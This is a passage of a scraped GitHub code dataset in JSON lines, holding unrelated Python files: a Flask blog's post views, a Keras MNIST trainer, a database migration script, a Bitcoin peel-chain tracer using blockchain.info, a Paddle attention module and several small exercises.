range(int(read())):\n name, kind = read().rstrip().split()\n if kind in cloth.keys():\n cloth[kind] += 1\n else:\n cloth[kind] = 1\n for value in cloth.values():\n case *= value + 1\n print(case-1)","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj9375.py","file_name":"boj9375.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35010533743","text":"from flask import Blueprint, render_template, url_for, redirect, abort\n\nfrom users.posts.form import PostForm\nfrom users.decorators import login_required\nfrom users.users.users import UserBlog\nfrom users.utils.generator.msg import Message\nfrom users.utils.generator.date_generator import time_now\nfrom users.comments.form import CommentForm\n\nposts_app = Blueprint('posts_app', __name__, url_prefix=\"/posts\")\n\n\n@posts_app.route('/new/', methods=['GET', 'POST'])\n@login_required\ndef new_post(blog_id):\n \"\"\"Takes a blog id and creates a new post within that blog\"\"\"\n\n form = PostForm()\n edit_draft = False\n\n if form.validate_on_submit():\n\n child_blog = _get_blog(blog_id)\n child_blog.Post.create_new_post(form.title.data, form.post.data)\n\n Message.display_to_gui_screen(\"The post was created successfully\")\n return redirect(url_for('posts_app.posts', blog_id=blog_id))\n\n return render_template('posts/new_post.html', form=form, blog_id=blog_id, edit_post=False, edit_draft=edit_draft)\n\n\n@posts_app.route('/')\n@login_required\ndef posts(blog_id):\n \"\"\"Takes a blog id and returns all posts associated with that blog\"\"\"\n\n child_blog = _get_blog(blog_id)\n\n assert child_blog or abort(404)\n return render_template(\"posts/posts.html\", posts=child_blog.Post.get_all_posts(),\n blog_id=blog_id, blog_name=child_blog.blog_name)\n\n\n@posts_app.route('/edit//', methods=['GET', 'POST'])\n@login_required\ndef edit_post(blog_id, post_id):\n \"\"\"\"\"\"\n\n child_blog = _get_blog(blog_id)\n edit_draft = False\n\n assert child_blog or abort(404)\n\n post = child_blog.Post.get_post_by_id(post_id)\n form = PostForm(obj=post)\n\n if form.validate_on_submit():\n\n post_data = get_updated_data(form, post)\n\n if post_data:\n post.update_post(post_data)\n Message.display_to_gui_screen(\"You post has successfully been updated.\")\n return redirect(url_for(\"posts_app.posts\", blog_id=blog_id))\n\n return render_template('posts/new_post.html', form=form, blog_id=blog_id, post_id=post_id,\n edit_post=True, edit_draft=edit_draft)\n\n\n@posts_app.route('//')\n@login_required\ndef delete_post(blog_id, post_id):\n \"\"\"\"\"\"\n\n child_blog = _get_blog(blog_id)\n child_blog.Post.delete_post(post_id)\n\n Message.display_to_gui_screen(\"The post has successfully been deleted\")\n return redirect(url_for(\"posts_app.posts\", blog_id=blog_id))\n\n\n@posts_app.route(\"/mode/preview/\", methods=['GET', 'POST'])\n@login_required\ndef post_preview(blog_id):\n \"\"\"Allows the user to preview a post before it is published\"\"\"\n\n form = PostForm()\n\n if form.validate_on_submit():\n return render_template(\"posts/post_preview.html\", form=form, date=time_now())\n return redirect(url_for(\"posts_app.new_post\", blog_id=blog_id))\n\n\n@posts_app.route(\"/permalink//\", methods=['GET', 'POST'])\ndef post_permalink(blog_id, post_id):\n \"\"\"\"\"\"\n form = CommentForm()\n\n child_blog = _get_blog(blog_id)\n\n post = child_blog.Post.get_post_by_id(post_id)\n\n if form.validate_on_submit():\n post.Comment.save_comment(comment=form.comment.data)\n return redirect(url_for(\"posts_app.post_permalink\", blog_id=blog_id, post_id=post_id))\n\n return render_template(\"posts/post_permalink.html\", form=form, post=post)\n\n\ndef _get_blog(blog_id):\n \"\"\"\"\"\"\n blog = UserBlog()\n return blog.get_blog(blog_id)\n\n\ndef get_updated_data(form, post_obj):\n \"\"\"get_updated_data(form_obj, post_obj) -> return dict\n\n Checks if the user has updated their data. If the data has\n been updated returns only the updated data otherwise returns\n an empty dictionary.\n \"\"\"\n\n data = {}\n\n if form.title.data != post_obj.title:\n data.update({\"title\": form.title.data})\n if form.post.data != post_obj.post:\n data.update({\"post\": form.post.data})\n return data","repo_name":"EgbieAndersonUku1/myBlog","sub_path":"src/users/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36439711910","text":"import random, numpy, time, os\nfrom pathlib import Path\n\n# setting parameters\n\"\"\"\ncont = random.random()\nsize = random.random()\nspatialfreq = random.random() * numpy.pi\nornt = random.random() * pi\nphase = random.random()\n\"\"\"\n\ndef contgenerator():\n randomcont = -2\n while randomcont > 1.5 or randomcont < -1.5 :\n randomcont = random.lognormvariate(0 , 1)\n return randomcont\n \ndef sizegenerator():\n randomsize = random.lognormvariate(1, 1)\n return randomsize\n \ndef spatialfreqgenerator():\n randomfreq = random.random() * numpy.pi * 2\n return randomfreq\n\ndef orntgenerator():\n randomornt = random.random() * numpy.pi * 2\n return randomornt\n \ndef phasegenerator():\n randomphase = random.lognormvariate(0, 1)\n return randomphase\n\ndef randomgenerator():\n return contgenerator(), sizegenerator(), spatialfreqgenerator(), orntgenerator(), phasegenerator()\n \n#assigning values\ncont, size, freq, ornt, phase = randomgenerator()\nprint(str(cont) + \", \" + str(size) + \", \" + str(freq) + \", \" + str(ornt) + \", \" + str(phase) + \", \") #print randomly generated parameters\n\n#making file\ndataPath='D:\\\\test\\\\'\ndate = (time.strftime(\"%Y-%m-%d\"))\ndirectory = dataPath+date\nif not os.path.isdir(directory):\n print('path not exist')\n os.makedirs(directory)\nlogFilePath =dataPath+date+'\\\\'+Path(__file__).stem #filepath\ni = 0\nFileName = f\"{i:03}\"+'.txt'\nwhile os.path.exists(logFilePath+FileName):\n i = i+1\n FileName = f\"{i:03}\"+'.txt'\nprint(logFilePath+FileName) #new file name and location\n\n#logging\ntimestamp = (time.strftime(\"%M-%S\"))\nprint(timestamp)\nstimarray = numpy.array([cont, size, freq, ornt, phase])\nprint(stimarray)\nfmt = \"%1.3f\"\nnumpy.savetxt(logFilePath+FileName,stimarray,fmt=fmt,delimiter = ',',newline = '\\n')","repo_name":"schollben/Psychopy","sub_path":"Psychopy_Scripts_Active/randomgenerator/randomgenerator.py","file_name":"randomgenerator.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5745020526","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom typing import Dict, Any\n\nfrom onion_config import ConfigLoader\nfrom beans_logging import logger\n\nfrom src.core.constants import EnvEnum, ENV_PREFIX_DB\nfrom src.core.configs import ConfigSchema\n\n\ndef _pre_load_hook(config_data: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"Pre-load hook to modify config data before loading and validation.\n\n Args:\n config_data (Dict[str, Any]): Pre-loaded config data.\n\n Returns:\n Dict[str, Any]: Modified config data.\n \"\"\"\n\n try:\n if \"ENV\" in os.environ:\n config_data[\"env\"] = os.getenv(\"ENV\")\n\n if (\"env\" in config_data) and (\n (config_data[\"env\"] == EnvEnum.STAGING)\n or (config_data[\"env\"] == EnvEnum.PRODUCTION)\n ):\n if f\"{ENV_PREFIX_DB}DSN_URL\" not in os.environ and (\n f\"{ENV_PREFIX_DB}HOST\" not in os.environ\n or f\"{ENV_PREFIX_DB}PORT\" not in os.environ\n or f\"{ENV_PREFIX_DB}USERNAME\" not in os.environ\n or f\"{ENV_PREFIX_DB}PASSWORD\" not in os.environ\n or f\"{ENV_PREFIX_DB}DATABASE\" not in os.environ\n ):\n raise KeyError(\n f\"Missing required '{ENV_PREFIX_DB}*' environment variables for staging/production environment!\"\n )\n except Exception:\n logger.error(f\"Error occured while pre-loading config!\")\n raise\n\n return config_data\n\n\nconfig: ConfigSchema\ntry:\n _config_loader = ConfigLoader(\n config_schema=ConfigSchema,\n pre_load_hook=_pre_load_hook,\n )\n # Main config object:\n config: ConfigSchema = _config_loader.load()\nexcept Exception:\n logger.exception(\"Failed to load config:\")\n exit(2)\n\n\n__all__ = [\"config\"]\n","repo_name":"bybatkhuu/rest.fastapi-orm-template","sub_path":"app/src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71075308587","text":"# input\n# number of minons (lines)\nn = int(input())\n# create minion class\nclass Minion:\n def __init__(self, min_val, max_val):\n self.min = min_val\n self.max = max_val\n# parse minions\nminions = []\nfor i in range(n):\n interval = input().split()\n interval = list(map(int, interval))\n minion = Minion(interval[0], interval[1])\n minions.append(minion)\n\n# sort minions\nminions.sort(key = lambda x: x.min)","repo_name":"bevvvvv/ExploringData","sub_path":"TriplebytePractice/minions.py","file_name":"minions.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70792549226","text":"import json\n\n\ndef preprocess(s: str) -> str:\n import re\n\n rubbish = re.compile(r\"!?<>\")\n cleared_s = rubbish.sub(\"\", s)\n cleared_s = re.sub(r\"[\\([{})\\]]\", \"\", cleared_s)\n return cleared_s.lower()\n\n\ndef parse_attributes(s: str) -> str:\n if s is not None:\n d = json.loads(s)\n res_string = []\n for key, values in d.items():\n res_string.append(key)\n res_string.append(values)\n res_string = \" \".join(res_string)\n return preprocess(res_string)\n return \"\"\n\n\ndef append_color_to_attrs(attr_dict, color_parsed: str) -> str:\n if attr_dict is not None:\n attr_dict = json.loads(attr_dict)\n if color_parsed is not None:\n attr_dict[\"Цвет\"] = color_parsed\n return json.dumps(dict(sorted(attr_dict.items(), key=lambda item: item[0])),\n ensure_ascii=False)\n return None\n","repo_name":"EgorSmi/matcher","sub_path":"matcher/utils/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41495187620","text":"from sklearn.model_selection import train_test_split\r\nfrom keras.models import Sequential\r\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\r\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\r\nfrom keras.models import model_from_json\r\nfrom keras.utils import np_utils\r\nfrom keras.preprocessing.image import img_to_array\r\nfrom PIL import Image\r\nfrom keras import backend as K\r\nimport numpy as np\r\nimport pandas as pd\r\nimport csv\r\nimport os\r\nimport theano\r\n\r\nK.set_image_dim_ordering('th'); print()\r\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\r\ntheano.config.optimizer = \"None\"\r\n\r\nx = [] #training data image info\r\ny = [] #corresponding labels\r\n\r\nw, h = 28, 28\r\n\r\nprint('Reading CSV training file...')\r\nwith open('input/train.csv', 'r') as csvfile:\r\n\treadCSV = csv.reader(csvfile, delimiter=',')\r\n\tfor row in readCSV:\r\n\t\tif (row[0] != 'label'):\r\n\t\t\tpixels = np.array(row[1:785]);\r\n\r\n\t\t\tdata = np.zeros((h, w, 3), dtype=np.uint8)\r\n\t\t\tfor i in range (0, (h*w)):\r\n\t\t\t\txPos = int(i/w)\r\n\t\t\t\tyPos = i - w*int(i/w)\r\n\t\t\t\tpixVal = int(pixels[i])\r\n\t\t\t\tdata[xPos, yPos] = [pixVal, pixVal, pixVal]\r\n\t\t\timg = Image.fromarray(data, 'RGB')\r\n\t\t\timg = img_to_array(img) / 255\r\n\t\t\timg = img.transpose(2, 0, 1)\r\n\t\t\timg = img.reshape(3, h, w)\r\n\r\n\r\n\t\t\tx.append(img)\r\n\t\t\ty.append(int(row[0]))\r\nprint('CSV training file read.')\r\n\r\nx = np.array(x)\r\ny = np.array(y)\r\n\r\nbatch_size = 32\r\nnb_classes = 10 #10 digits\r\nnb_epoch = 3\r\nnb_filters = 32\r\nnb_pool = 2\r\nnb_conv = 3\r\n\r\nuniques, id_train = np.unique(y, return_inverse=True)\r\ny_train = np_utils.to_categorical(id_train, nb_classes)\r\n\r\nprint('Creating model...')\r\nmodel = Sequential()\r\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv, border_mode='same', input_shape=x.shape[1:]))\r\nmodel.add(Activation('relu'));\r\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv));\r\nmodel.add(Activation('relu'));\r\nmodel.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)));\r\nmodel.add(Dropout(0.5));\r\nmodel.add(Flatten());\r\nmodel.add(Dense(128));\r\nmodel.add(Dropout(0.5));\r\nmodel.add(Dense(nb_classes));\r\nmodel.add(Activation('softmax'));\r\nmodel.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=['accuracy'])\r\nprint('Model created.')\r\n\r\nnb_epoch = 5;\r\nbatch_size = 5;\r\n\r\nprint('Fitting model...')\r\nmodel.fit(x, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1)\r\nprint('Fitting complete.')\r\n\r\nprint('Saving model...')\r\nmodel_json = model.to_json()\r\nwith open(\"Model.json\", \"w\") as json_file:\r\n\tjson_file.write(model_json)\r\nmodel.save_weights(\"Model.h5\")\r\nprint('Model has been saved.')","repo_name":"wd2311/MNISTDataSet-MachineLearningWithCNNs-DigitRecognizer","sub_path":"MakeAndSaveModel1.py","file_name":"MakeAndSaveModel1.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23811232590","text":"from utils import get_connection, get_config\nimport petl as etl\n\ndef get_connection_to_dbs(source_config):\n '''\n Get the connection to the source and destination databases\n :param: configs to connect to source DB\n '''\n from_db_conn = get_connection(source_config['host'], source_config['dbname'],\n source_config['user'], source_config['pass'])\n config = get_config()\n to_db_conn = get_connection(config['host'], config['dbname'], config['user'], config['pass'])\n return from_db_conn, to_db_conn\n\ndef transfer_data(from_db_conn, to_db_conn):\n '''\n Transfer data from databases given cursor to execute queries to connected databases\n Limitations:\n 1. poc.address_id is currently marked as -1 since it was not provided in test data and is a FK non-null constraint\n 2. institution2poc table is not available in old schema\n 3. role table is already populated in bill.sql file so that table is skipped by this script\n 4. poc_poc_id is currently set to be poc_id since no relevant information is available about the column\n 5. project2moc_project.role_id column is not available in old schema and is a not null field in new schema\n so we default it to 1 for now.\n 6. project2moc_project.username is not available from old schema so currently set to empty\n 7. raw_item_ts.item_id has duplicates when imported from item_ts. So we currently filter out and insert only uniques.\n\n :param from_db_conn: source database connection\n :param to_db_conn: destination database connection\n '''\n\n # Emptying out tables with possible foreign key constraint issues\n fk_dep_tables = ['poc2project', 'poc2moc_project', 'poc', 'raw_item_ts', 'item', 'project', 'institution2moc_project' ]\n for table_name in fk_dep_tables:\n table = etl.fromdb(to_db_conn, \"select * from {} where 1=0\".format(table_name))\n etl.todb(table, to_db_conn, table_name)\n\n # Tables with no change in schema\n insert_as_tables = ['institution', 'address', 'item_type', 'item2item', 'catalog_item']\n for table_name in insert_as_tables:\n table = etl.fromdb(from_db_conn, \"select * from {}\".format(table_name))\n etl.todb(table, to_db_conn, table_name)\n\n # inserting dummy address for constraint matching\n dummy_address = [{'address_id': -1}]\n dummy_address_table = etl.fromdicts(dummy_address)\n etl.appenddb(dummy_address_table, to_db_conn, 'address')\n\n poc = etl.fromdb(from_db_conn, 'select * from poc')\n poc_transformed = etl.cutout(poc, 'domain_id', 'user_uid')\n poc_dummy_address = etl.replace(poc_transformed, 'address_id', None, -1)\n etl.todb(poc_dummy_address, to_db_conn, 'poc')\n\n project_names_table = etl.fromdb(from_db_conn, \"select distinct project_name from project\")\n moc_project_transformed = etl.addrownumbers(project_names_table)\n moc_project_transformed = etl.rename(moc_project_transformed, {'row': 'moc_project_id'})\n etl.todb(moc_project_transformed, to_db_conn, 'moc_project')\n\n domain = etl.fromdb(from_db_conn, \"select * from domain\")\n domain_table_transformed = etl.cutout(domain, 'domain_uid')\n domain_table_transformed = etl.rename(domain_table_transformed, {'domain_id': 'service_id', 'domain_name': 'service_name'})\n etl.todb(domain_table_transformed, to_db_conn, 'service')\n\n project = etl.fromdb(from_db_conn, \"select * from project\")\n moc_project = etl.fromdb(to_db_conn, \"select * from moc_project\")\n project_moc_project_joined = etl.join(project, moc_project, key='project_name')\n project_table_transformed = etl.cutout(project_moc_project_joined, 'project_name')\n project_table_transformed = etl.rename(project_table_transformed, {'domain_id': 'service_id', 'project_uid': 'project_uuid'})\n etl.todb(project_table_transformed, to_db_conn, 'project')\n\n institution2project = etl.fromdb(from_db_conn, \"Select * from institution2project\")\n project = etl.fromdb(to_db_conn, \"select project_id, moc_project_id from project\")\n inst2project_project_joined = etl.join(institution2project, project, key='project_id')\n inst2moc_project = etl.cutout(inst2project_project_joined, 'domain_id')\n etl.todb(inst2moc_project, to_db_conn, 'institution2moc_project')\n\n project2poc = etl.fromdb(from_db_conn, \"select * from project2poc\")\n project2poc_project_joined = etl.join(project2poc, project, key='project_id')\n poc2moc_project = etl.cutout(project2poc_project_joined, 'project_id', 'domain_id')\n poc2moc_project = etl.addfield(poc2moc_project, 'role_id', 1)\n poc2moc_project = etl.addfield(poc2moc_project, 'poc_poc_id', lambda rec: rec['poc_id'])\n etl.todb(poc2moc_project, to_db_conn, 'poc2moc_project')\n\n poc2project = etl.cutout(project2poc, 'domain_id')\n poc2project = etl.addfield(poc2project, 'role_id', 1)\n poc2project = etl.addfield(poc2project, 'username', '')\n etl.todb(poc2project,to_db_conn, 'poc2project')\n\n item = etl.fromdb(from_db_conn, \"select * from item\")\n item_transformed = etl.cutout(item, 'domain_id')\n etl.todb(item_transformed, to_db_conn, 'item')\n\n raw_item_ts_unique = etl.fromdb(from_db_conn, \"WITH summary AS ( SELECT its.item_id, its.start_ts, its.end_ts, its.state, its.catalog_item_id, ROW_NUMBER() OVER(PARTITION BY its.item_id) AS rk FROM ITEM_TS its) SELECT s.* FROM summary s WHERE s.rk = 1\")\n raw_item_ts_unique = etl.cutout(raw_item_ts_unique, 'rk')\n etl.todb(raw_item_ts_unique, to_db_conn, 'raw_item_ts')\n\n\nif __name__ == '__main__':\n\n # Source DB is the DB from which you have to migrate data which is based on the old schema model.\n # The data in the source_db will be migrated to the moc_reporting DB. Provide the source_db configs below.\n source_db_config = {\"dbname\":\"\", \"host\":\"\", \"user\": \"\", \"pass\": \"\"}\n from_db, to_db = get_connection_to_dbs(source_db_config)\n transfer_data(from_db, to_db)\n","repo_name":"kevinliang43/MOC_Reporting","sub_path":"data_migrator.py","file_name":"data_migrator.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2317457500","text":"# 임규연 (lky473736)\n\n# 형 변환 : 명시적과 묵시적으로 나눔\n# 명시적 : str = int (str) 따위처럼 직접 자료형을 명시해줌 (타입 변환)\n# 묵시적 : 암묵적으로 파이썬이 자료형을 인식함\n\np = 123.1234567\np = round (p, 2)# round 함수를 이용해 소수점 n자리수까지 표현 가능하다 (.%nf와 비슷한 형태)\nprint (p)\n\n","repo_name":"lky473736/learningpython","sub_path":"B0321-3.py","file_name":"B0321-3.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71551197549","text":"import requests, json\nimport pandas as pd\nimport numpy as np\nimport networkx as nx\nfrom networkx.drawing.nx_agraph import write_dot, graphviz_layout\nimport matplotlib.pyplot as plt\nimport datetime, time\nimport openpyxl as xl\nimport csv\n\nclass BlockChain:\n\n def __init__(self):\n self.header = header\n # inputs=self.txData.get('inputs', [])\n # if inputs: #None, []\n # if isinstance(inputs, list):\n\n def initAddressFromExcel(self, address):\n url = requests.get(\"https://blockchain.info/rawaddr/\" + address, headers=self.header)\n print(\"initAddress 상태코드 : \" + str(url.status_code))\n text = url.text\n time.sleep(5)\n self.addrData = json.loads(text)\n\n def getAddrType(self):\n if self.addrData['address'][0] == '1':\n return \"P2PKH\"\n elif self.addrData['address'][0] == '3':\n return \"P2SH\"\n else:\n return \"Bech32\"\n\n return self.addrData['address']\n\n def getTxHashList(self):\n txList = []\n tx_n = len(self.addrData['txs'])\n for txNum in range (0, tx_n):\n txList.append(self.addrData['txs'][txNum]['hash'])\n return txList\n\n def initHashInfo(self, txHash):\n url = requests.get(\"https://blockchain.info/rawtx/\" + txHash, headers=self.header)\n print(\"initHashInfo 상태코드 : \" + str(url.status_code))\n text = url.text\n time.sleep(5)\n self.txData = json.loads(text)\n # with open('file_name.json', 'w') as f:\n # json.dump(self.txData, f, indent=4)\n\n def initAddress(self, address):\n url = requests.get(\"https://blockchain.info/rawaddr/\" + address, headers=self.header)\n print(\"initAddress 상태코드 : \" + str(url.status_code))\n text = url.text\n time.sleep(5)\n self.addrData = json.loads(text)\n\n def isMultipleInput(self):\n if len(self.txData['inputs']) >= 2:\n return True #\n else: # Single Input\n return False\n\n def isSingleOutput(self):\n if len(self.txData['out']) == 1:\n return True #\n else:\n return False\n\n def isMultiOutput(self):\n if len(self.txData['out']) == 2:\n return True\n return False\n\n def isSingleInput(self):\n if len(self.txData['inputs']) == 1:\n return True\n return False\n\n def getTime(self):\n uTime = self.txData['time']\n txTime = datetime.datetime.fromtimestamp(uTime)\n return str(txTime)\n\n def getBalance(self):\n return self.addrData['final_balance']\n\n\nheader = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp.image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'}\n\nblock = BlockChain()\n\n#bring address from excel file\nlocation = \"D:\\python\"\n# file = \"all node.xlsx\"\n# data_pd = pd.read_excel('{}/{}'.format(location, file), header=None, index_col=None, names=None)\n# address = pd.DataFrame.to_numpy(data_pd)\n# address = '1KLsKGS1RyAUmuPG2pgCJM1B9FHeD4ezkU'\naddress = '14D4BuxgnB1AxPoJ25oMVQ8DC6vdq1ex7i'\naddress = '1KTVSLLsD4N9N3bYqfhUxbUoKZbR8GJyAa'\naddress = '16mMg3Cb6dTq4igsqvjuuTMt5xcAEbVVXC'\naddress = '1DkXjYUqVQkgBeGeiMWcKDUf78DBe58gGi'\n\n\nnow = time.localtime()\ndate = \"%d%02d%02d%0d%02d%02d\" % (now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec)\nf = open('D:\\python\\peelchainTime' + date + '.csv', 'a')\nf.write(\"Current Address,Next Address,Time,Fee\\n\")\n\nnextAddr = address\n\nfor x in range(0, 1000):\n block.initAddress(nextAddr)\n txList = block.getTxHashList()\n\n for txhash in txList:\n block.initHashInfo(txhash)\n\n if block.isSingleInput() == True and block.isMultiOutput() == True:\n if block.txData['inputs'][0]['prev_out']['addr'] == block.addrData['address']:\n txTime = block.getTime()\n if block.txData['out'][0]['value'] > block.txData['out'][1]['value']:\n nextAddr = block.txData['out'][0]['addr']\n else:\n nextAddr = block.txData['out'][1]['addr']\n\n print(\"current addr : \" + block.txData['inputs'][0]['prev_out']['addr'])\n print(\"next addr : \" + nextAddr)\n print(\"Time : \" + txTime)\n print(\"Fee : \" + str(block.txData['fee']/100000000))\n print(\"Addr Type : \" + block.getAddrType())\n print(\"Balacne : \" + str(block.getBalance()))\n f.write(block.txData['inputs'][0]['prev_out']['addr'] + \",\" + nextAddr + \",\" + txTime + \",\" + str(block.txData['fee']/100000000) + \",\" + block.getAddrType() +\n \",\" + str(block.getBalance()) + \"\\n\")\n\nf.close()\n","repo_name":"KeunWooBae/blockchain2","sub_path":"blocktime.py","file_name":"blocktime.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1180623057","text":"def cropped_tuple(tpl, var):\n line = [str(j_val) for j_val in tpl]\n string = ''.join(line)\n a = string.find(var)\n b = string.find(var, a + 1)\n if (a >= 0) and (b >= 0):\n new_tpl = tuple(line[a:b + 1])\n elif (a >= 0) and (b < 0):\n new_tpl = tuple(line[a:])\n else:\n new_tpl = ()\n return new_tpl\n\n\nmy_tpl = (2, 1, 3, 4, 5, 9, 7, 1, 6, 8, 0)\nelem = input('\\nВведите случайный элемент: ')\nprint(cropped_tuple(my_tpl, elem))\n\n# зачет!\n","repo_name":"Mihalich2981/Python","sub_path":"Module20/03_function/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33251749932","text":"import paddle\nimport paddle.nn as nn\n\n\nclass Attention(nn.Layer):\n def __init__(self, params):\n super(Attention, self).__init__()\n self.params = params\n # hidden_size :256\n self.hidden = params['decoder']['hidden_size']\n # attention_dim :512\n self.attention_dim = params['attention']['attention_dim']\n self.hidden_weight = nn.Linear(self.hidden, self.attention_dim)\n # spatial attention\n \n self.attention_conv = nn.Conv2D(1, 512, kernel_size=11, padding=5, bias_attr=False)\n self.attention_weight = nn.Linear(512, self.attention_dim, bias_attr=False)\n self.alpha_convert = nn.Linear(self.attention_dim, 1)\n\n def forward(self, cnn_features, cnn_features_trans, hidden, alpha_sum, image_mask=None):\n # W_h*h_t:b 256 -> b 512(b attention_dim)\n query = self.hidden_weight(hidden)\n # A(coverage_alpha):b 1 H W -> b 512 H W 用于通道变换\n alpha_sum_trans = self.attention_conv(alpha_sum)\n # W_a*A: b 512 h w -> b h w 512-> b h w attention_dim\n \n coverage_alpha = self.attention_weight(paddle.transpose(alpha_sum_trans,[0,2,3,1]))\n # w_T*tanh( W_a*A + W_h*h_t + T + P) + b\n # tensor的加法遵循广播机制 所以相加之后的大小为 b h w 512\n \n alpha_score = paddle.tanh(paddle.unsqueeze(query,[1, 2]) + coverage_alpha + paddle.transpose(cnn_features_trans,[0,2,3,1]))\n \n # b h w 512 -> b h w 1\n energy = self.alpha_convert(alpha_score)\n # 进行归一化\n # energy = energy - energy.max()\n # energy = energy - paddle.max(energy,keepdim=True)\n # energy = energy - paddle.max(energy,keepdim=False)\n energy = energy - energy.max()\n # b h w 1 -> b h w \n # energy_exp = paddle.exp(energy.squeeze(-1))\n energy_exp = paddle.exp(paddle.squeeze(energy,-1))\n # image_mask :b 1 max_h max_w\n # * 应该是对位相乘 b h w ->b max_h max_w\n if image_mask is not None:\n # energy_exp = energy_exp * image_mask.squeeze(1)\n energy_exp = energy_exp * paddle.squeeze(image_mask,1)\n\n \n alpha = energy_exp / (paddle.unsqueeze(paddle.sum(paddle.sum(energy_exp,-1),-1),[1,2]) + 1e-10)\n \n alpha_sum = paddle.unsqueeze(alpha,1) + alpha_sum\n \n context_vector = paddle.sum(paddle.sum((paddle.unsqueeze(alpha,1) * cnn_features),-1),-1)\n return context_vector, alpha, alpha_sum","repo_name":"Lllllolita/CAN_Paddle","sub_path":"alignment/step1-5/can_paddle/models/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"22634989741","text":"class Solution:\n def splitString(self, s: str) -> bool:\n def backtrack(res, x):\n if not x:\n return True\n\t\t\t\n for i in range(1, n+1):\n\t\t\t\n if not res or int(x[:i]) == res[-1] - 1:\n res.append(int(x[:i]))\n\t\t\t\t\t\n if backtrack(res, x[i:]) and len(res) > 1:\n return True\n res.pop()\n\n return False\n n = len(s)\n return backtrack( [], s)\n ","repo_name":"jealsab/Competitive-Programming","sub_path":"1849-splitting-a-string-into-descending-consecutive-values/1849-splitting-a-string-into-descending-consecutive-values.py","file_name":"1849-splitting-a-string-into-descending-consecutive-values.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2815489320","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 18 18:17:58 2021\n\n@author: user\n\"\"\"\n\nimport numpy as np\nimport cv2\n\nimg = cv2.imread(\"./floor.jpg\")\ncv2.imshow('ori', img)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ngray = np.float32(gray)\n\n#blocksize 点越小,越没办法判断转角\n#ksize 最大只能等于 blocksize\n#ksize 在使用 gauss-sobel 此公式时的大小,如果越大则细节处理越不精细\n#ksize 如果跟 blocksize 一样大就只做一次 blocksize,越小做越多 blocksize\n#k 越大则转角必须要越明显,才可以知道,反之越小时,只需要小转角就可以判断\ndst = cv2.cornerHarris(gray,5,1,0.1)\ndst = cv2.dilate(dst, None)\nimg[dst>0.01*dst.max()] = [0,0,255]\ncv2.imshow('result', img)\n\n","repo_name":"TheRiseOfDavid/NTUTcs_media","sub_path":"hw06/david/t01.py","file_name":"t01.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6744124030","text":"import math\nimport pytest\n\nimport numpy as np\n\nfrom bluesky.callbacks import CallbackCounter\nfrom bluesky.examples import stepscan\nfrom bluesky.tests.utils import DocCollector\nfrom bluesky.callbacks.stream import LiveDispatcher\n\n# Do not run these test if streamz is not installed\ntry:\n import streamz\n has_streamz = True\nexcept ImportError:\n has_streamz = False\n\nrequires_streamz = pytest.mark.skipif(not has_streamz,\n reason='Missing streamz library')\n\n\nclass NegativeStream(LiveDispatcher):\n \"\"\"Stream that only adds metadata to start document\"\"\"\n def start(self, doc):\n doc.update({\"stream_level\": \"boring\"})\n super().start(doc)\n\n def event(self, doc):\n modified = dict()\n for key, val in doc['data'].items():\n modified['modified_{}'.format(key)] = -math.fabs(val)\n doc['data'] = modified\n return super().event(doc)\n\n\nclass AverageStream(LiveDispatcher):\n \"\"\"Stream that averages data points together\"\"\"\n def __init__(self, n=None):\n self.n = n\n self.in_node = None\n self.out_node 